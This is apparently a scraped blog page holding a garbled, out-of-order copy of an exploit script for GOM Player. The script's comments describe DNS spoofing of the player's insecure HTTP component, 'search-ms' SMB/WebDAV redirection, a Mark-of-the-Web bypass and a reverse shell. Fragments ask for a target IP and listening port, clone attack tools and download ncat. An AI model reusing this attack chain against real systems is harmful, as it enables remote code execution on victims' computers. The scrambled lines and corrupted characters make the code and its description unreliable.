![]() ![]() n("git clone " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py Print(" - Impacket has been downloaded.") n("git clone " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket Os.system("cd " + expWorkDir + "/smb-shared & wget >/dev/null 2>&1 & unzip -o -j >/dev/null 2>&1 & rm -rf README") #Downloading ncat Os.system("cd " + expWorkDir + "& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit. Time.sleep(1) # It's necessary for exploit stability. Os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit. SmbFolderName = "GomUpdater" # change this (optional)ĮxpWorkDir = "gomExploitDir" # change this (optional) Print("\n- Stage 1: Downloading neccesary tools.") Print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) S = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) Gw = os.popen("ip -4 route show default").read().split() ListenPort = input("- Listening port for Reverse Shell: ")ĭef fCreate(fileName,fileContent): # File create func. TargetIP = input("- Target IP address: ") Print("You need root privileges to run the exploit, please use sudo.") Import time,os,zipfile,subprocess,socket,sys # Some spaghetti and a bad code but it works :)īanner = """\033[38 5 196m+-+ Then specify the port to listen to for the reverse shell. ![]() # Exploit Usage: Run it and enter the IP address of the target. # Full disclosure, developers should be more careful about software security. ![]() # In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target. # The IE component in the GOM Player's interface uses an insecure HTTP connection. ![]() It is used by millions of people worldwide. # Impacts: GOM player has been downloaded 63,952,102 times according to CNET. Change Mirror Download # Exploit Title: GOM Player 2. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |